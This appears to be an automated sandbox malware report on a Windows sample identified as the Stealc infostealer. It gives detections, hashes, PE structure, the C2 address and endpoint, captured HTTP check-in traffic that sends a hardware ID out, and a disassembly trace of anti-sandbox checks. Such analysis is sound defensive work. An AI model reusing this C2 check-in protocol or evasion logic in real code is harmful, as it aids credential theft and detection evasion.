                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php217%VirustotalBrowse
                http://185.215.113.37/ws17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php(17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php$17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php017%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.php/18%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php2file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37file.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.php0file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php/file.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php$file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.1701335364.0000000001277000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37afile.exe, 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.php(file.exe, 00000000.00000002.1701335364.0000000001262000.00000004.00000020.00020000.00000000.sdmptrueunknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.37
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1523253
                  Start date and time:2024-10-01 11:06:04 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 2m 40s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:1
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 86
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.947435420181266
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'856'512 bytes
                  MD5:7104794e5bc6d9668df3a837983e43df
                  SHA1:6bbeef17a4443db7e332123055796aace85064d6
                  SHA256:e1eca91fddecc4eb0729d7a47e7950cd07bcfe3a195721c2ea132e79654a9fbf
                  SHA512:292b4a7b45ee0217ffd846739053ea5eb62646123e1e755fb13489333cdf5c3d307e7d6e6cee3a0f60cffb2266e8c8874185f82b4ca7acbe0da8b92d91a7d60d
                  SSDEEP:24576:9H0JnrSqDsGenZ2+XIRQQD3USAlNoMuXOZ67J4viv7PZ7eaZHfoht7wkT4vYYx:GJrmNnE+XfpnH0ttTP5D/oht7jcQ
                  TLSH:9E8533A629AD71F1D9AC81FF0F6B3A70FF40D65325B8C41169151B6CE9322ADB3B3109
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Static PE Info

                  General

                  Entrypoint:0xaa0000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007F7F1C978EDAh
                  rdmsr
                  sbb al, 00h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  jmp 00007F7F1C97AED5h
                  add byte ptr [edx], al
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], dh
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [edx], al
                  or al, byte ptr [eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax+eax*4], cl
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  adc byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add dword ptr [edx], ecx
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Rich Headers

                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x25b0000x22800fd93384c9ea43104f47548e8e90558f2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x25e0000x2a10000x200f3f087bdc73a381427c1e28c970e022aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  gbgxsggn0x4ff0000x1a00000x19f200a4a8a5ef8b27c70f3e5acbd4a92d539cFalse0.9950286764152364data7.953932899320452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  lycvdkjm0x69f0000x10000x40004c2fa35af70099414bab8910d96b267False0.8134765625data6.274237333962727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x6a00000x30000x220076bb3e1adaeeb6f418bc4c149110dc11False0.06939338235294118DOS executable (COM)0.8118838505904251IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-01T11:06:56.881309+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 1, 2024 11:06:55.945058107 CEST4973080192.168.2.4185.215.113.37
                  Oct 1, 2024 11:06:55.950764894 CEST8049730185.215.113.37192.168.2.4
                  Oct 1, 2024 11:06:55.950851917 CEST4973080192.168.2.4185.215.113.37
                  Oct 1, 2024 11:06:55.950983047 CEST4973080192.168.2.4185.215.113.37
                  Oct 1, 2024 11:06:55.958194017 CEST8049730185.215.113.37192.168.2.4
                  Oct 1, 2024 11:06:56.653424025 CEST8049730185.215.113.37192.168.2.4
                  Oct 1, 2024 11:06:56.653573036 CEST4973080192.168.2.4185.215.113.37
                  Oct 1, 2024 11:06:56.656116009 CEST4973080192.168.2.4185.215.113.37
                  Oct 1, 2024 11:06:56.660963058 CEST8049730185.215.113.37192.168.2.4
                  Oct 1, 2024 11:06:56.881215096 CEST8049730185.215.113.37192.168.2.4
                  Oct 1, 2024 11:06:56.881309032 CEST4973080192.168.2.4185.215.113.37
                  Oct 1, 2024 11:06:59.832824945 CEST4973080192.168.2.4185.215.113.37

                  HTTP Request Dependency Graph

                  • 185.215.113.37

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449730185.215.113.37806968C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Oct 1, 2024 11:06:55.950983047 CEST89OUTGET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 1, 2024 11:06:56.653424025 CEST203INHTTP/1.1 200 OK
                  Date: Tue, 01 Oct 2024 09:06:56 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 1, 2024 11:06:56.656116009 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 42 46 36 39 45 33 34 37 32 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a
                  Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="hwid"1BF69E3472EB3294564547------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="build"doma------IEBFHCAKFBGDHIDHIDBK--
                  Oct 1, 2024 11:06:56.881215096 CEST210INHTTP/1.1 200 OK
                  Date: Tue, 01 Oct 2024 09:06:56 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:05:06:52
                  Start date:01/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x470000
                  File size:1'856'512 bytes
                  MD5 hash:7104794E5BC6D9668DF3A837983E43DF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1701335364.000000000121E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1660531613.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:7.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.7%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:24
                    execution_graph 13432 4869f0 13477 472260 13432->13477 13456 486a64 13457 48a9b0 4 API calls 13456->13457 13458 486a6b 13457->13458 13459 48a9b0 4 API calls 13458->13459 13460 486a72 13459->13460 13461 48a9b0 4 API calls 13460->13461 13462 486a79 13461->13462 13463 48a9b0 4 API calls 13462->13463 13464 486a80 13463->13464 13629 48a8a0 13464->13629 13466 486b0c 13633 486920 GetSystemTime 13466->13633 13468 486a89 13468->13466 13469 486ac2 OpenEventA 13468->13469 13471 486ad9 13469->13471 13472 486af5 CloseHandle Sleep 13469->13472 13476 486ae1 CreateEventA 13471->13476 13474 486b0a 13472->13474 13474->13468 13476->13466 13830 4745c0 13477->13830 13479 472274 13480 4745c0 2 API calls 13479->13480 13481 47228d 13480->13481 13482 4745c0 2 API calls 13481->13482 13483 4722a6 13482->13483 13484 4745c0 2 API calls 13483->13484 13485 4722bf 13484->13485 13486 4745c0 2 API calls 13485->13486 13487 4722d8 13486->13487 13488 4745c0 2 API calls 13487->13488 13489 4722f1 13488->13489 13490 4745c0 2 API calls 13489->13490 13491 47230a 13490->13491 13492 4745c0 2 API calls 13491->13492 13493 472323 13492->13493 13494 4745c0 2 API calls 13493->13494 13495 47233c 13494->13495 13496 4745c0 2 API calls 13495->13496 13497 472355 13496->13497 13498 4745c0 2 API calls 13497->13498 13499 47236e 13498->13499 13500 4745c0 2 API calls 13499->13500 13501 472387 13500->13501 13502 4745c0 2 API calls 13501->13502 13503 4723a0 13502->13503 13504 4745c0 2 API calls 13503->13504 13505 4723b9 13504->13505 13506 4745c0 2 API calls 13505->13506 13507 4723d2 13506->13507 13508 4745c0 2 API calls 13507->13508 13509 4723eb 13508->13509 13510 4745c0 2 API calls 13509->13510 13511 472404 13510->13511 13512 4745c0 2 API calls 13511->13512 13513 47241d 13512->13513 13514 4745c0 2 API calls 13513->13514 13515 472436 13514->13515 13516 4745c0 2 API calls 13515->13516 13517 47244f 13516->13517 13518 4745c0 2 API calls 13517->13518 13519 472468 13518->13519 13520 4745c0 2 API calls 13519->13520 13521 472481 13520->13521 13522 4745c0 2 API calls 13521->13522 13523 47249a 13522->13523 13524 4745c0 2 API calls 13523->13524 13525 4724b3 13524->13525 13526 4745c0 2 API calls 13525->13526 13527 4724cc 13526->13527 13528 4745c0 2 API calls 13527->13528 13529 4724e5 13528->13529 13530 4745c0 2 API calls 13529->13530 13531 4724fe 13530->13531 13532 4745c0 2 API calls 13531->13532 13533 472517 13532->13533 13534 4745c0 2 API calls 13533->13534 13535 472530 13534->13535 13536 4745c0 2 API calls 13535->13536 13537 472549 13536->13537 13538 4745c0 2 API calls 13537->13538 13539 472562 13538->13539 13540 4745c0 2 API calls 13539->13540 13541 47257b 13540->13541 13542 4745c0 2 API calls 13541->13542 13543 472594 13542->13543 13544 4745c0 2 API calls 13543->13544 13545 4725ad 13544->13545 13546 4745c0 2 API calls 13545->13546 13547 4725c6 13546->13547 13548 4745c0 2 API calls 13547->13548 13549 4725df 13548->13549 13550 4745c0 2 API calls 13549->13550 13551 4725f8 13550->13551 13552 4745c0 2 API calls 13551->13552 13553 472611 13552->13553 13554 4745c0 2 API calls 13553->13554 13555 47262a 13554->13555 13556 4745c0 2 API calls 13555->13556 13557 472643 13556->13557 13558 4745c0 2 API calls 13557->13558 13559 47265c 13558->13559 13560 4745c0 2 API calls 13559->13560 13561 472675 13560->13561 13562 4745c0 2 API calls 13561->13562 13563 47268e 13562->13563 13564 489860 13563->13564 13835 489750 GetPEB 13564->13835 13566 489868 13567 48987a 13566->13567 13568 489a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13566->13568 13573 48988c 21 API calls 13567->13573 13569 489b0d 13568->13569 13570 489af4 GetProcAddress 13568->13570 13571 489b46 13569->13571 13572 489b16 GetProcAddress GetProcAddress 13569->13572 13570->13569 13574 489b68 13571->13574 13575 489b4f GetProcAddress 13571->13575 13572->13571 13573->13568 13576 489b89 13574->13576 13577 489b71 GetProcAddress 13574->13577 13575->13574 13578 486a00 13576->13578 13579 489b92 GetProcAddress GetProcAddress 13576->13579 13577->13576 13580 48a740 13578->13580 13579->13578 13581 48a750 13580->13581 13582 486a0d 13581->13582 13583 48a77e lstrcpy 13581->13583 13584 4711d0 13582->13584 13583->13582 13585 4711e8 13584->13585 13586 471217 13585->13586 13587 47120f ExitProcess 13585->13587 13588 471160 GetSystemInfo 13586->13588 13589 471184 13588->13589 13590 47117c ExitProcess 13588->13590 13591 471110 GetCurrentProcess VirtualAllocExNuma 13589->13591 13592 471141 ExitProcess 13591->13592 13593 471149 13591->13593 13836 4710a0 VirtualAlloc 13593->13836 13596 471220 13840 4889b0 13596->13840 13599 471249 __aulldiv 13600 47129a 13599->13600 13601 471292 ExitProcess 13599->13601 13602 486770 GetUserDefaultLangID 13600->13602 13603 486792 13602->13603 13604 4867d3 13602->13604 13603->13604 13605 4867cb ExitProcess 13603->13605 13606 4867ad ExitProcess 13603->13606 13607 4867c1 ExitProcess 13603->13607 13608 4867a3 ExitProcess 13603->13608 13609 4867b7 ExitProcess 13603->13609 13610 471190 13604->13610 13611 4878e0 3 API calls 13610->13611 13613 47119e 13611->13613 13612 4711cc 13617 487850 GetProcessHeap RtlAllocateHeap GetUserNameA 13612->13617 13613->13612 13614 487850 3 API calls 13613->13614 13615 4711b7 13614->13615 13615->13612 13616 4711c4 ExitProcess 13615->13616 13618 486a30 13617->13618 13619 4878e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13618->13619 13620 486a43 13619->13620 13621 48a9b0 13620->13621 13842 48a710 13621->13842 13623 48a9c1 lstrlen 13625 48a9e0 13623->13625 13624 48aa18 13843 48a7a0 13624->13843 13625->13624 13628 48a9fa lstrcpy lstrcat 13625->13628 13627 48aa24 13627->13456 13628->13624 13631 48a8bb 13629->13631 13630 48a90b 13630->13468 13631->13630 13632 48a8f9 lstrcpy 13631->13632 13632->13630 13847 486820 13633->13847 13635 48698e 13636 486998 sscanf 13635->13636 13876 48a800 13636->13876 13638 4869aa SystemTimeToFileTime SystemTimeToFileTime 13639 4869ce 13638->13639 13640 4869e0 13638->13640 13639->13640 13641 4869d8 ExitProcess 13639->13641 13642 485b10 13640->13642 13643 485b1d 13642->13643 13644 48a740 lstrcpy 13643->13644 13645 485b2e 13644->13645 13878 48a820 lstrlen 13645->13878 13648 48a820 2 API calls 13649 485b64 13648->13649 13650 48a820 2 API calls 13649->13650 13651 485b74 13650->13651 13882 486430 13651->13882 13654 48a820 2 API calls 13655 485b93 13654->13655 13656 48a820 2 API calls 13655->13656 13657 485ba0 13656->13657 13658 48a820 2 API calls 13657->13658 13659 485bad 13658->13659 13660 48a820 2 API calls 13659->13660 13661 485bf9 13660->13661 13891 4726a0 13661->13891 13669 485cc3 13670 486430 lstrcpy 13669->13670 13671 485cd5 13670->13671 13672 48a7a0 lstrcpy 13671->13672 13673 485cf2 13672->13673 13674 48a9b0 4 API calls 13673->13674 13675 485d0a 13674->13675 13676 48a8a0 lstrcpy 13675->13676 13677 485d16 13676->13677 13678 48a9b0 4 API calls 13677->13678 13679 485d3a 13678->13679 13680 48a8a0 lstrcpy 13679->13680 13681 485d46 13680->13681 13682 48a9b0 4 API calls 13681->13682 13683 485d6a 13682->13683 13684 48a8a0 lstrcpy 13683->13684 13685 485d76 13684->13685 13686 48a740 lstrcpy 13685->13686 13687 485d9e 13686->13687 14617 487500 GetWindowsDirectoryA 13687->14617 13690 48a7a0 lstrcpy 13691 485db8 13690->13691 14627 474880 13691->14627 13693 485dbe 14772 4817a0 13693->14772 13695 485dc6 13696 48a740 lstrcpy 13695->13696 13697 485de9 13696->13697 13698 471590 lstrcpy 13697->13698 13699 485dfd 13698->13699 14788 475960 13699->14788 13701 485e03 14932 481050 13701->14932 13703 485e0e 13704 48a740 lstrcpy 13703->13704 13705 485e32 13704->13705 13706 471590 lstrcpy 13705->13706 13707 485e46 13706->13707 13708 475960 34 API calls 13707->13708 13709 485e4c 13708->13709 14936 480d90 13709->14936 13711 485e57 13712 48a740 lstrcpy 13711->13712 13713 485e79 13712->13713 13714 471590 lstrcpy 13713->13714 13715 485e8d 13714->13715 13716 475960 34 API calls 13715->13716 13717 485e93 13716->13717 14943 480f40 13717->14943 13719 485e9e 13720 471590 lstrcpy 13719->13720 13721 485eb5 13720->13721 14948 481a10 13721->14948 13723 485eba 13724 48a740 lstrcpy 13723->13724 13725 485ed6 13724->13725 15292 474fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13725->15292 13727 485edb 13728 471590 lstrcpy 13727->13728 13729 485f5b 13728->13729 15299 480740 13729->15299 13731 485f60 13732 48a740 lstrcpy 13731->13732 13733 485f86 13732->13733 13734 471590 lstrcpy 13733->13734 13735 485f9a 13734->13735 13736 475960 34 API calls 13735->13736 13737 485fa0 13736->13737 13831 4745d1 RtlAllocateHeap 13830->13831 13833 474621 VirtualProtect 13831->13833 13833->13479 13835->13566 13837 4710c2 ctype 13836->13837 13838 4710fd 13837->13838 13839 4710e2 VirtualFree 13837->13839 13838->13596 13839->13838 13841 471233 GlobalMemoryStatusEx 13840->13841 13841->13599 13842->13623 13845 48a7c2 13843->13845 13844 48a7ec 13844->13627 13845->13844 13846 48a7da lstrcpy 13845->13846 13846->13844 13848 48a740 